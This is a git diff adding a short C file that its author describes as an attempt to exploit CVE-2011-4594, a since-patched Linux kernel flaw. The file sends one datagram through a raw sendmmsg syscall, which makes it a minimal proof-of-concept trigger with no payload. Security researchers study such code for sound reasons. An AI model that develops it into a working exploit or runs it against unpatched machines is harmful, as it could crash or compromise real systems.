diff options
Diffstat (limited to 'splicket.c')
-rw-r--r-- | splicket.c | 78 |
1 files changed, 78 insertions, 0 deletions
diff --git a/splicket.c b/splicket.c new file mode 100644 index 0000000..e939041 --- /dev/null +++ b/splicket.c @@ -0,0 +1,78 @@ +/* + * Socket Splickt + * by zx2c4 + * + * This is an attempt to exploit CVE-2011-4594. + * + * It was patched in bc909d9ddbf7778371e36a651d6e4194b1cc7d4c. + * + */ + + +#define _GNU_SOURCE +#include <string.h> +#include <stdlib.h> +#include <stdio.h> +#include <unistd.h> +#include <signal.h> +#include <netdb.h> +#include <sys/types.h> +#include <sys/ioctl.h> +#include <sys/socket.h> +#include <net/if.h> +#include <net/ethernet.h> +#include <linux/if_packet.h> +#include <asm/unistd.h> +#include <errno.h> + +#ifndef __NR_sendmmsg +#if defined( __PPC__) +#define __NR_sendmmsg 349 +#elif defined(__x86_64__) +#define __NR_sendmmsg 307 +#elif defined(__i386__) +#define __NR_sendmmsg 345 +#else +#error __NR_sendmmsg not defined +#endif +#endif + +struct reimp_mmsghdr { + struct msghdr msg_hdr; + unsigned int msg_len; +}; +static inline int reimp_sendmmsg(int fd, struct reimp_mmsghdr *mmsg, unsigned int vlen, unsigned int flags) +{ + return syscall(__NR_sendmmsg, fd, mmsg, vlen, flags, NULL); +} + +int main(int argc, char *argv[]) +{ + const int fd = socket(AF_INET, SOCK_DGRAM, 0); + char buf[10]; + struct iovec iovec[1]; + struct reimp_mmsghdr datagram; + struct sockaddr_in addr; + + memset(buf, 0, sizeof(buf)); + memset(iovec, 0, sizeof(iovec)); + memset(&datagram, 0, sizeof(datagram)); + memset(&addr, 0, sizeof(addr)); + addr.sin_family = AF_INET; + addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK); + addr.sin_port = htons(10000); + iovec[0].iov_base = buf; + iovec[0].iov_len = sizeof(buf); + datagram.msg_hdr.msg_iov = iovec; + datagram.msg_hdr.msg_iovlen = 1; + datagram.msg_hdr.msg_name = &addr; + datagram.msg_hdr.msg_namelen = sizeof(addr); + + errno = 0; + if (reimp_sendmmsg(fd, &datagram, 1, 0) < 0) { + perror("reimp_sendmmsg"); + exit(1); + } + + return 0; +}
\ No newline at end of file |